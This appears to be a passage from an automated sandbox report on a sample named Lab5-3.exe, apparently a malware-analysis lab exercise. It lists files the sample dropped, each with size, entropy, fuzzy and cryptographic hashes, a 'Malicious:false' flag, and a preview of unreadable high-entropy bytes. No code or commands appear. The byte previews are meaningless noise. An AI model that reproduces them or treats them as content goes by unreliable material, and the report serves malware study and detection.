                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BYnYeAUZ4Y8uNF1xm7W1EpLp5LHfUTid3hBaUoSGFcmeykEdEElU92i:eYeAUZVc7W1Cp5YGx0uKeY2ElUJ
                                                                                                          MD5:AEC4B903E6D60FC48213E8C341CB4D02
                                                                                                          SHA1:9ADC63608FEF6C413B9823797625CAEF53ECF4B3
                                                                                                          SHA-256:B2C6D04F7F58D8C0344FE30710EFFD3D52A5991ECB72189ECD7C974EBCBCB09B
                                                                                                          SHA-512:3232A744F9E63C7C76691EC3B96AF8E50B9B47201BC60A92140194ACA201716DC0B26BA90C37CA1D613E0C3D423563F18153DE5EFF40A9B9F3F1C26B248B1FF6
                                                                                                          Malicious:false
                                                                                                          Preview:.F.....`.3........x8...6.*......B\..r.bG..l.E<.*G..M.g.|..B..u.C....E.*7>..q!.c....J......Y<...(#.]WQO}.bj. ..@.#.j....RbZ.IT..Fq.rS.R|JkX....D..T.h.F........E....U..>...ns^j;#.t~.AL.....2...tm..H.w\.Zl.i`....:....x.FF.S..fhs ..=..*..S.......... .<.Z...f...|0_.5*8...W"..5K..........NV.../..dHh....Q..u..{...kL6.>.G...]g.Y..z.f.z.}/[...B...#.L.?(...(...U"].._...I}0d]ID?.l.....'<.........._.M....H./h..._.....#....j.....2.-.`{oc...G d....0.^.(.K...M[..9..c./-...rxg. 7.....aO....P.../.!.}..x..g..z.-ju...,.W<....D.....c...t...-C.Jk...T.=y...h..2.? ....r.%..,@r...j..T......A^:......7.;.....3N.05^_..U..~C.v.IQ...A......T5..B .9....hW'V.'.?h..$wMa..i....W.0.&...p.S.jy1.&.yh..:@.T...g..V...z........KI....#).}..qAt|..d...N....VXzs.N1._...L.|....'.7UE/......./..,..?E.#i..':v..W..o.......$.G.. ...x.[..w|a._.4.Fj.._nI..wF.g..H..2..ul..m.g.p.uH....7.-.:R.8...\m..6.........u..#?"....l..5......Oub..9G....$......A...f..|Jb.$2....B...L..cZ.RR..YF......c..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.923871824208348
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5qtJcEBPW6sqbMw2b4pdxKAmBgNz2PeehHfUTid3hBaUoSGFcmeykEdEElU92i:5qJcN6upbkdxKAmuUPeeiGx0uKeY2Elk
                                                                                                          MD5:13D42D9D7D073ACBFD756C75E21163A5
                                                                                                          SHA1:728869A66BC925C566C6E4C6DA02891E47D7DE45
                                                                                                          SHA-256:0B48B120A00D171A9C638A78B03AEC216D845A0FD8441B0DB5B3FB75FC0385ED
                                                                                                          SHA-512:E6C42FEE233E28D77564C41D5ECF2927A2728BDA7A1C59F3C25B5353F047C5AC0BDC7F268295C14686DB4F2FF9F3363DB6E26050F507848F8FEB60BD6533D111
                                                                                                          Malicious:false
                                                                                                          Preview:...}...'..'.W..... .....c? ..Ef ....l....O..!.z..$.....V,....$.B.K.zv..E. .o`).M....R..2.F..E....s*.Jwt..[.[...d.6w.`c$.fY.......A.c....p...m..k..M..y.].X....8%y^k_....u.o.|4fN\. T,...J.v.b..H2.\....T..%%.>t..ht..EO.!e.R..We.YL..nl..qd...8Ox..tkb.]...,.._&...i$...r!.}5....*....3CGW.(q.g[.b.U...Kp..Q....d..).d.SY\.b:.sOb........<l.(._...mdTH.....z.Q..b..l.><....hs~..n.;..n#..r...L.P.....".'.{..Eje.q..8Q...(......."...x...nx;..R.....Ai....fNxY.^.n. .!.[g....xV.2.05.iU..30*.B...\(......LE....y.!.v:;i.)....e..5.....v.6=v..6._.L.dP..g.%J.....:.F..!..-...?;......Q..T.c..lf.v$..sg.2C..>....p..6G.....-5.C.$.....WK......~.....;....d~.).)ul...q..:..R...o.....D.9.....?..:...5|......QW8....8......,.q.gQ...Y......'..D..0.Y#V..l.5>].h6J|.#.(.{..8.RO..T../!...7Mu.3..?.^.#..]..q},..3.>..h..wqU}Fp."...'._V.....+.[...?....p.Jd..<...P....._...3w..(E.....7.y......L..r6.o.lfX.5..5..uS..6g..bB.+,..5}Y......b.TA.v.&1.o!..3f..?..2.k..@G.'l..."..R.m.i..X../.M!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.936511306023784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YjxG6gPvjotpfnk+Yihna77zEHfUTid3hBaUoSGFcmeykEdEElU92i:YMRv0fnkZiZA3DGx0uKeY2ElUJ
                                                                                                          MD5:C8B10839354BE9C01A894A3E7C2521E6
                                                                                                          SHA1:825D7E6656DCBD29D57C2B58C5196E2F58971604
                                                                                                          SHA-256:D5E5C9BB2843874129E616F0A4702BDE9AD4D8EDBCEE60E5032A9ECBF58BA1FE
                                                                                                          SHA-512:252A3F16945C56F5F013C9A2049CB57640419F65EC954898146943CD524B508778925704EA5EA225EC89563E5B49DA855AF62F4760EAB4D438E62518D5064E1A
                                                                                                          Malicious:false
                                                                                                          Preview:.>8..jc.KE....wU.T,.4.........C;.:.>....94.\.N c..."......a...C.@/wqw.."2a9V.*e.v.....Jc...cK.....s..[sJ..[D\..4..*.^.-...._.0.QJ*6...X.<.".kA.}q7....../e..55./.....`.F!.......!LL@...>b..<...."^...E@.\.r....c(w.[..l+<6K...9..()>..O....D..y...>.czJ,.[."=....N&......43v...}.:.~.|..c.hP....|.I./.sXm...3...t.+*....{. .7..^1..":3.n....X$/......T.e.\.......Q.8!O.\..\..s+.s[u.9$....Q.0.M?.$...U.,....^^...'..o....N...`...UO.4.Uaa.....$...&....\:........(i.$........S....e.._..S.8.J..LT.u/.[.....2-..+~-....f..C.q.kX...e<.|..|./Pa).X.......f....}.9..y..X..1....{T..z.2:c....:.#..)E..w.k..\....:hXc.. 8.....Tb/v...t.H.A.Ams......O..../......2...E.Y./g..{.i..c.myP..#vi.....?..o.(..0.7s.q-P.a(.@.^..A)...k..;........U....R..$X..PCo5...P.T)1.....hFX.ue.....]QIUd.K..3.p....3..t...z....E>.m..*Y..^..+..k.q..j.....@.w....I{.Fr.<B@.g...}K...@+p.K.n..H9.....-....:.JN..d..]fw.v.o.....,l.EY.J...e+.-.X=.du..~..Rn.2.W.\%.....)bDI.;=.....m.u.zV.<s...t."Z....^.\Ws.";l.A.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.919750397167268
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8hpoADadEI+EwmqWvWMGhHfUTid3hBaUoSGFcmeykEdEElU92i:yptDadEIALWvsiGx0uKeY2ElUJ
                                                                                                          MD5:0B339CEB45E8B0621DA7A8030EF51AA3
                                                                                                          SHA1:498660FDD81F529294F5256A105733559DEAA734
                                                                                                          SHA-256:02D4A2024D9079B5891D08151EDA050E98E37448627052F63E49577BA453B0C6
                                                                                                          SHA-512:9B170072F33C3629BD25D7D84A591C87326582C02BE1E9A3B489691F7C372C73F3E3AB325C07237A1A5014A7FE1C88D10E8379CAAE508412DFA8ECE86013C604
                                                                                                          Malicious:false
                                                                                                          Preview:a..Q...u..D..:..._.r..d;.b*.v.-o/9q..$L..h...X.....X.....r.v...)....%.... Q,}...LUd>0.l.lO.'a.<.%.>R.P..L.S..<(..^.R..1......II)l..-..y7..A......e.....(..o".((...q..:....sKN*!.+...B...D.........^G0...hB..Z.....<.@.bma(~.......*.\.6u..X...P.....[8$R.\n............N.-. ..'Ox>=....~)."-Y..w.ELe/g..f.67.>Q....3af"..y..L.1\.9Hh..."..1.6PQ.....m.B.d{...."....=D`@....9../B....vG.R.......h.9.m9v0....{\..W.M%..[...p.....2I,E4.......\b.g7.{i....c.w..[<....ka+.{a..O........u..=.E...dZ..*..H....5@q5R...%..b....$&;.o....I.X..p.h.g...v4.."..S...9}.9.....J...Y<..V,.....]..m_.&......L..5y.`......t..5...Xe~.j.w.. ...Y7.6..&\t......r....)....>b.yz.wB..\.L..P...0!Ua].d... 9.....T.[..GJ'.v.NR.+..j$L@!...O....,....J=....[.$.a.....$1Mzs.#q....E[..S.[..R+....e..`..O....J/..q*...O..z(m'b..W......&..`...Lk...V^........X..\T=f.....+.........~\s..............,M.._.]w..~....]. .R]=..b......<..-.'_.5.[.C._$~..........2..[....e.#.....L~..g....S....<.`:...P.m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.936802762572128
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lLwR1zSJdAriilwgfktuHfUTid3hBaUoSGFcmeykEdEElU92i:l0bzSnAAPGx0uKeY2ElUJ
                                                                                                          MD5:C5623CE0891A2405348C7ABAED341674
                                                                                                          SHA1:D8C340E0DC623007AB7BA9F7DC164B9538CB283C
                                                                                                          SHA-256:6AD1B23C67E5663035825FDCF96A086014992A8BCDB0371B014B31F3EEAC5C5D
                                                                                                          SHA-512:23A2FF572AF436CCB6F676A2F80393BFCB1060699E7A1445A47BCB686F44EF98404C598C239205F1F38A74E62BE9254B9DC0AAF702F36BB9735DB1A2E3D3EB28
                                                                                                          Malicious:false
                                                                                                          Preview:.8.E.q..`.9....-.C.E..$.q..j3o.Be..........TE.8iq..KU...H.B.D.z:.....X.'F..._..M..3...6..S...l.../.E..f....N&...@..U..R.M..j..-K......>.^...[#..X6I..(4:.....K@.s.\7...F..2..r......uO..4.YZ}.. .(v.J.e...P...H...a}..n.uZj..}?.&6...d....Y...5.q....n.q.9B5CqYg.TC.x.#i[a.5..d.$.[..s."F..|...z,06.qE&.b.z9.J......y..M.K.R....N.].+....>..l;.\....o.N.I.4..a7....":R.3......:H.E......O7....V.+..<p[.5....?h......6.v`.../X..4'.;Cbt..IV.bbt*.F.O*...9...U.d....77..6..[:WP\O6%.2M......m.....m.....w(.M..~...^...[.C.......{l......1.0%Y.G=...s$F.5....*.I.8...........+~.o...].....N..t.?.jI.l.4......LK.)..c..8.=.-$...l.Y..........$..E....K._../..0.~...9.@*..yx..+U....q....x..*aDX.K.va.RT.x.N.=.|9..<...J.D.rM.....JI...L...\n%.W.y...=4......p...w..[M. f[..(.h0.w....z.....>...8.Xg.......... .@-.I.U..6..".[...F...NMY/y..X..z.i..X.|...6..#.Z...6.Z..'.0....*..2...<.......:....d..\.>..\".m...l'.....w..)...c.l.B.SM.."...h......Sv.R5........g...@..A..io..{R.a.[.......m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.943520606678738
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rEkfOxXfhr9z00Ol4lwX2mRUgAEmVoIoeXYjHB3JIj7HfUTid3hBaUoSGFcmeykt:r4hrxEvX2mApoeXsHBGMGx0uKeY2ElUJ
                                                                                                          MD5:F149259693AD83175CD15499EA3F9340
                                                                                                          SHA1:1152596ED8E59AC9F0F629F956494A82892BAA64
                                                                                                          SHA-256:8FC3755AF28C739394BDE494DA09A60CDBE5251036713B7D9807DD9C862A2D62
                                                                                                          SHA-512:0204A2F03158516A9EB4C61F3DC23D561EDBE1A1AA4BDBF7DCFAAA964D65C213CD8BC31C1DEEE371BD8FC91A2E35D08429B106F9243E578644EE5B4E50734766
                                                                                                          Malicious:false
                                                                                                          Preview:6..y....RnI.!!......@>7.f....UK.}..6...o6.U..4A.0P.Q....2...tY.... j.P:.M...v.k.E.H.......Tq...s..?..-^...).%.L$.-.L..*.....%{Y.[^..K..<......|....^..ZJ^...+....E..>.>Dj.P...8*+&./......+z..~H..i...IH.w...i.S8. t.<....d...........$..h.]....}...f.0q..2..|....y...T....n.id.....S.q.L....&..ts.K.V...m.p..........z(..Z.....*..xc...WDh\J...j.;'.$.bJ...%..jH...Nn.....$.Y...m...X...c}.......fs..e....}.....^E(...,TA}.e......cj]...1.*R......."..Nb~.6...@....xK.(J?...!...S...5.V..<.A.....Yf.u1.rA2.@..4.....K......T....t...m..=..z%.r.a..b]...u.....P:5B...._..M..6.w,.c...T..).....V/._.=...M...N..[......9R.5.....t.N.o.z..*v.bgt^J..B..sS......I[\n...8....0.&...V7D..{...$I&|..I....:.+.^.Y...dC.....Z.N]..8...s.y._t....0Q..].8w.%..,q..y.XAI73K`.l...[."....E*...g..o..B..|........UMIL...4.-}.U$.......:2....q .....-.?..,S...0;...;.(.....z...&..O..e"..+..b......}./Y.....K..G...S7@........3...Ue.?TR.-..w7\..J..CS.$U.....1f.K........a...... .mP..On......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.929684546811692
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VipqM7TKQlifzgmJfDTyOHfUTid3hBaUoSGFcmeykEdEElU92i:0pqOOQGJLWGx0uKeY2ElUJ
                                                                                                          MD5:E938D7CBE537AD152BF19D3488007DB4
                                                                                                          SHA1:6BAF7A1714F5F5517EB91D196536C35FA382BE23
                                                                                                          SHA-256:244F365AC4F157015AFB838E725DA5E828AC7443FC976DDF8D8341D787C1F9C6
                                                                                                          SHA-512:52950CB0669535948F6882ED09584AE50E06ED5F8B69867E9B2CF3AFC20282B34417A833688DFE257E7371B225B04524255546C8B8D922317F711896C554BC4A
                                                                                                          Malicious:false
                                                                                                          Preview:.. <.W.!...Q.*...e".X...h.tR.V..K....U.....E|..bA..'V..'.DR11.........q....0.Dvx.Vq...$8c...........x=..c.Y..^.l.......t..B..#-........R..k.....s..n..f_.#?k{EF.7..9..x..m~....v.>.../...^.....'..f.}..v..yZ.o.dANXh/.f6......*=..I+...c\C..4j.p.Y.......I....M......`lf..F...0X .g.71jz{.\..>.t..&<.u$.j%w.....7.....X.c\..j.n....;.0.......0.......x>....=,w0...GpFS.f.......$%...4g|D.<..7.].$"K.".Z8...^.F......Gj7.V..!..w.DQ%.Q=...".{V..,C.x...V..(..c.X/......\NK..S.f....Wr[3..g..W....)=.^....R..v..../0.a .R.Jvze.R.n..IO..9&~_.Qty......B]..g..>.............M.z.q>.I....b5...,t..H......p.v.._..;@r..._'....2..*..c...3...`p...=.h...ba.<.G:.q`N.W......&A.R..d.B.9..lA&.h+.....m<....lF-..+....G.,.eP.uZ\&.....T.Ln....z...F.wo)......v=7V....G.o..0a......M..-`5.a.}....At.&O...x.3..!1N.....4R.b.8.Oq=j.;y!.....w.E..K..\P.j.....a.....q..Q....[R.`.....c...Z.u.\..#..d?5......5u....>.1-...~....Y.....B.....'.w.zB..a....O.'o;..Go..w..yh.-.J.mm...o..0..0.0.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2640
                                                                                                          Entropy (8bit):7.92861370797464
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Fcwg/J0sKEebvkeJx2/XgO6V1sXtPQHfUTid3hBaUoSGFcmeykEdEElU92i:FcZ/J0sKlvZx2Yh1sdPXGx0uKeY2ElUJ
                                                                                                          MD5:09705F1BA009E7AEE44FBA0964DFD9E2
                                                                                                          SHA1:499F63C33577E6C8ABB78CFABA2981984C700B12
                                                                                                          SHA-256:F4BB3AC68FE44764846D9AEB12DE2B68EF979194498DA9B7F51F78E7D3261536
                                                                                                          SHA-512:63802A9672E9FD3C16EE9184DFE38D3718915BEA23BC73836EF8834698560CA8FFD77C4A4A3A6ED7631A1869DE758B6316C1BA0F0A3658CD956984C2F2F7A94B
                                                                                                          Malicious:false
                                                                                                          Preview:...4]...Z."...g]..2%$..!j..&tn.!j.....4q...,..v......u..\.@g........2..q.d:.{|`.+Qr.uq...._...S.O...h.._rKD.......J.N.4.dt..[.....w..Zh-..^.6....w[3..x...e..n..Z.c.[. ..7.>%KC.>.(7..H..:,f..g..$.!2.Lh.V.L....2M.57....2..rQ.E'L5 ..B....... ..>...k..8Z,fz....p......<;..6M\S5>...rj&z...m....z[M...y../........q.h6..\.......=.....O..7;....W>jZ.p.k]...!q..1k.].f..9}...<|GHB"....\...N'..@/......b......k...WOyvZH...`8mn...)..d..-....:.e..!..rU<.U.E.F.^.=....!..m..{..[..'be...J.q.a.-..."..v....~w..y.R.,9..Gm.c?.<.B........./.<gH.....,..M..i..C..............O..t....;..a.....%..uM.3...]eW.x....-...*xQ....I.c\...D..QB..i.}.U.Bk1W.._..<..'r.e..p.C...|-..".1a.s.QbN.;f..g....-..4.1.B9...m)I.4z..%.\.<Gtp3...<VYx..,..,..i..x..0...W[6.z6.@Ij.VGO..-.o.V".!Mcr..[.....I..+.G4...... .........,.:e..........|.b.[..7...oS.F=...`.........2.a.c..3...iw.f......b.\#gn.l.yW..t...:.U.]C.yYW..|._e..C...((.$.;......zU.if..F...f...S......i+.>...'..../.Qsh......'...fR.!...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3328
                                                                                                          Entropy (8bit):7.941370778452034
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:aSdwJo+VftfkocHXRrAJs4wGIgGx0uKeY2ElUJ:afJlVtfkocHXSJB6T0Cb
                                                                                                          MD5:B20A9DDF5FA6A1C89D72FF6DC78E6B62
                                                                                                          SHA1:360F3452200300EECEC2850053F08DC30F7BCD80
                                                                                                          SHA-256:E45450EB96DA16D14AB3358C59FDD7CDC724C28EC3D4A82975C3A2E39D33A6B6
                                                                                                          SHA-512:FEA6ED5455A6BE95A3B972CE3D97063D0F261BB264D5880F2DDC2EA6BB6573C8575AD5DB86D9307F1A8AAAAE435C313CCACB6817A7D688F7B4AB92931FF66EC7
                                                                                                          Malicious:false
                                                                                                          Preview:...D.6z}\.....$./6......A..~...(.....*$...eb..?n.Z............6......;;;.'......eM.xu.............C..G..#.. .\..D.l...."Z6DX...W...dff...#...d.....F..%.d...Sf>\..Y.]..u..*.4Y...}cr./.3ik.M.."...P\.a...78n..B..].V.B.j.H..PR...mt.c...Z..'...rx..+1....|.....[.8.....h.SC:.>.......L.:...a.....1.3.0...7.3.=.<..^.=....H.].Z...R.?+.s.}^..c#Rv.].)t.$...o.....<W...2..f_^M........=OAn.......k.t.....n...Z....7.S...j..}...R...^.e.&...J,...i.7x.m.h..^....'j~x...L...l......Q..t.....V''....R.....T.Vr..".].I.^......]..;-B5w}.....|1l.o?49.{M......@~....$|...x....Q..%4..~0}N.4..DE..2.Ha.I.@]..]$]'E...$..X..P,.B-^.i...,..#7...F.!....B..r6{j_...L"{..VK+.X['.. @..dy^I...*....N@..z....==q..P'.8^...;...S....V...%/Y.)....l..Aj0...B..E.O.5wp...jqL.'.$.=..5..f..4.P&..w...>c8.+.'R....?.b.S.........n.._C.&.3O./U.........}.D..._Q....v_.oG.G...Oe...rJ....?.zV..i...D..0.l..6..0./^-2HY...)Cf....fi..}...ek#.p..=..n...Z..D4..R....R..GT.2..x.Jn.(...._.....&..X.......l.LzN....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.945662799842502
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:501Yq+/3ymMTGAJu73x5WSKQA9Gx0uKeY2ElUJ:50+q+KmMTGAI3x5eQb0Cb
                                                                                                          MD5:6BDDB0674A7B0563F4A93889AFCB5863
                                                                                                          SHA1:AE22427C911E91B83E6FD152335017DDD0AF724A
                                                                                                          SHA-256:3B77D397EF91AA8915A998158B39BE32CD5F6D89E3FAD63A128758E7A8355147
                                                                                                          SHA-512:04C77576AAAF066BE14C6D8683B4EFF26EF81CEBA39AAF3248AC71D8249B2336747BFBAE80DD3AFC6EB660E7E0FFF6C32030418C7328D43DC37AEBC1E0050E02
                                                                                                          Malicious:false
                                                                                                          Preview:Y......1.s..D..:...P.......Z..w..{n..g...$Q...tl_......x`....+.h......F...wb}..Z9.....}^..-.@....a...`$..<z_.h..I..k...o.1h..V.;...).....:..Z..._..@...}R...-.o.....l.Sp.......Y.W...v....#._.X.}Nu.U6.o.~.2..~\..w2.....av&.$.6y.q'.....-,..x.2..t.......\$..<o:u3.:C]....>.$:,K.......3.rp}...*j..<Ve..q3.q..u.....7Ae.p......:.9g..j. Q....L.C.. ....../o..A-.j.f..f....t..BqiU.v.....G0.9.!@.;..k.5...1..+.....}..#@.......}.L.<...^..y.\...:zo.I>.U.~uu.*..\.$.7(.............>.9... ..!V........C......F..!..... :....=*.......X%|..i.......0.hu......'..w1!zF.s.Cn.x2B....j.X1..S.|w....K....2..I..NZ..5....*f...I....\6w5.$.....Ajx=.G...............!...j*.........Aq.y7g..z6...T.FR`.z...}S....h......(..t.<,...fL.dl+..v.w.H.E.d...t&..d..^.6-...7..f^....l..r....K...nE...$..3=.c.....5.P.C.+9.....<._..'.L."...u\.{ ].!5..k)..i5....t..X%...7e.%.......).a'k................91..p.:...w...l..V.~3.Dl....sZ.DV.s.EW.......nwIuH.F.E....H.L#..p....0.i(#....{R...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.947852979574232
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2Qft1nkKIEceonQ0B0tnpGEGx0uKeY2ElUJ:9IEcPQ0B0hpGn0Cb
                                                                                                          MD5:D986B96305640B99C51D7BE3E250FF31
                                                                                                          SHA1:EBB9553F1E4440793B5E445EA53382B058628525
                                                                                                          SHA-256:22DE744813929D7D6F940D73BFF092625F7C03C762FB0954737235C8A16ACF52
                                                                                                          SHA-512:F3AD4CBFE27A0915A66244C344BDBA783DB806E0583BC7500167AB4F15F1A7739C1956E4182A2ED6911C8FB85E9D4F2592858361CAD0F685714E951EBABD1BFD
                                                                                                          Malicious:false
                                                                                                          Preview:.......06..I...1...,..v+d..8.S.h?........$..e...j......g..&.g>.A.G.~...#t...u..5.X...%...(.Wh.....N... Z....@.rI.o\~..W^.85..2.e..e... ].(.sO..q.X._.......<x.x.3.'..ux..;..^%i.Jzr..z..B.F:o....<.w.D..p.T........6=.=m..,.....-.&...F!.h......$....".Oh9G.]n....Y..74..M.."o.}.......%.d.......B.!.w#.3%@.7,.*=.nkAST.A.t../.U..y..q(l....../X..Z..V........7 |H.....)..h..X.......w).WZ.b2..l......=..A.7......n.<...'.g..iF....P..\Ltb j.. i.*.....C....+...y#..|..._.&h.@..x..A..Z.MfU.M@1Qw...K..B...<..p.1....f..U?4*..$:v.....~n.i..K......{.>.(.1./.E.'..qa.p.......+.}..YQ......N.g...Ys.n...$...[.......m.....V..j.{..&..g.7.sH.T}.,"0.-............Q.`.....Bf..........rCF.OZ.".!..Uh.2.F..K..Z..a?L`.RK.g{..$>y...<.:8:N..r.Cg......{0..f.xTg..L..G.w."...ab^.8g...xY..|.HI.P.....y....;<#.X.?.B...O....z...!J\|<..{..0...S.G.$....D.DK......>.2.p.i..M.....D.9s6..F..x....>.q\...f..%..1......-Q$..,.......m.@.hq...o.`.j....7...<b{..:r.d?......'.)......t.'.*..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3504
                                                                                                          Entropy (8bit):7.950206578867068
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BHKiUsQGylbiBlQkHpMncbhvvmQatbPhHfUTid3hBaUoSGFcmeykEdEElU92i:Ty9ixHpMctvvmQatbKGx0uKeY2ElUJ
                                                                                                          MD5:2B6830747FBC8C26DD2A0FC941506E63
                                                                                                          SHA1:C184B0B9B5F08F4BDCCA2816A3D39DEAF63DE611
                                                                                                          SHA-256:5ABC0371DF77F62784869A0ED27A283F157A23D2A9528379D771602CA37C2950
                                                                                                          SHA-512:A0DF9D8566725D3591707CACE443E28E188306EB154483451EDBA4B3BD80D618254978E824BFD97070E08A947B661B3A2979C549C40B9469AFAEC3669102A641
                                                                                                          Malicious:false
                                                                                                          Preview:P..0g.T..Q..F..R..u$.|.....l...]U.........5E...."....*..........-&.........G.N..............l.&.....d.R...zC}....l......z..ge.Inj..o...S..3;....{...EV.c..[5c.|S ..0...C......D....a..........^.h..b..z..N...+.1.Ocs.P...xA.]sP..~.9`t.........0.........R.A.....|5..`....J.!u..W.#V.j=.oh(.....~.....$7.....(.....Kc..;.N.Gb...;.zr1.V.%........3.......ii.E..V..+...;.......O..D.....9>.*x..~y....B.....y..:..-..sSET.6..b..(.I.xq.R..8....M..;g.Z......<..Z.[.E.C.......[w..$. Ug/.&..U.@{.........1m....NGN..&...i9....P.4.Z..(.N5..A4~.k....z8..I..+.7..=...hK.......n...O0.2.,H..._..p........t..C.......JdS_0..k.."'....>.:.!..F....h..u|..?.O8.6.;.m...-.y#pv..xMRK.;88..+.s.u[h{..Z...0.O....kU/MqG.ak..<.},e......!.H....|$qu......d.-(.&{|f....ml.%..y..2....(..Z+m.-n~..>.l........b.&F.7..]|..J....."........lS....y.pf.E.....g}(.N. .....s...t.q.\q....a..k7.W.Z..0.Q..ngS. ..K.T...6B..I.IQw.x..|gz.ro.....}......R#.k...l6V.v..!.e`.)...Lh...If.$...Z...%k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.951490607327037
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:rhLkNeVQTYc/8xDIi5pVEPGx0uKeY2ElUJ:JkNOc/8J1510Cb
                                                                                                          MD5:AE968CC1AD8374DB0EDCD4E7939752DB
                                                                                                          SHA1:5C8E03125B06D76C10CBD730014B90DB75A77EDF
                                                                                                          SHA-256:2909B9109EC43AC94C3FB10544FF2713233CEB9DD0EF4A05CE127242BF523637
                                                                                                          SHA-512:D50A3198D366689C998CE28628D7F3B1DD44D1FC7B0ECFA0186DFA027F87AF09CE4E6A6110BD9050580505CFD1899F532DB44C41E2CED661BE70F3EA9C99F533
                                                                                                          Malicious:false
                                                                                                          Preview:1.GB3.]....).L...8n.Q.k..C...J...d{.~..5^=e)...........?N.b....t.@$....../i.+....^0...S0..e..q...z.^_.w.[m"3.TO.+..k.r.9.j]).Y{..=lK.)N.........,..5.x.S..*....:..6g ...0...:..!G+qC.r.6....G[u..0:....Q..5.(.b.%R..B.p......]n.v...:....bP8...48.ETZ6...d$..M776$...D.Y..........#....i..%DQ.|f:....zq. U&D....._.....l..s..".....L].a..H..C..a<;.....Y[d.l.%.o~!....oQ.n...wm...=."......v:?...(..O-...l&(...c...b]G5...A.....|.X9a.R..........,..E.8..9J...Pd.l....u....v......M..|.f6..Wh.1s....z...)....z...:..PA>D6=*..w..-W...RU...3.%h....C.el...K.g....8..cs..d....%...$.#_....R`...Gm.A.....H.1.G.....oy....T.s.x..g.ZZ.y....+..@....iC5d...*.s.`.`n.....iI7....../.ju../:8}_Q...2.).p..aA...L.C....2i$.^b.<.r...Y..!:......n.4......../...A..}.74..a....\.V.Pn.;.P4]G.;.P.|......p...?}...(h+ ..m4Y.k.A..Xm.........I.cs.>..m.O..Nf......e..j....@.;..!...5o.R...@.....@..J@..h.v-B.-.6...k..P.b+=..R.l..0...=...g6y...eLvU-...<#...........z...Yk..*nt_be...."..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.932321883001398
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:w5oF5DJLIfgwiejkAmHumNcYrsuRI6F3ILOUnqbtrs/HfUTid3hBaUoSGFcmeykt:VbDGv2OYrs96F3TUqbtFGx0uKeY2ElUJ
                                                                                                          MD5:C51612E6082F05439574B51B0BA847F1
                                                                                                          SHA1:430A9D7FD4E91ACC7622795EA482E6776237872C
                                                                                                          SHA-256:72C9B422F0CB809BFFEF4042684E5AB4D802FE25A221FECED794AE34C0F0FE41
                                                                                                          SHA-512:BB3D7BA2CE79A8266CDF385C2430886B8AE19F6195F4C155025F98378B98509933F889405CD0760EBC1C6F001D0C880211CFE81DB81824545553313415AF3ED0
                                                                                                          Malicious:false
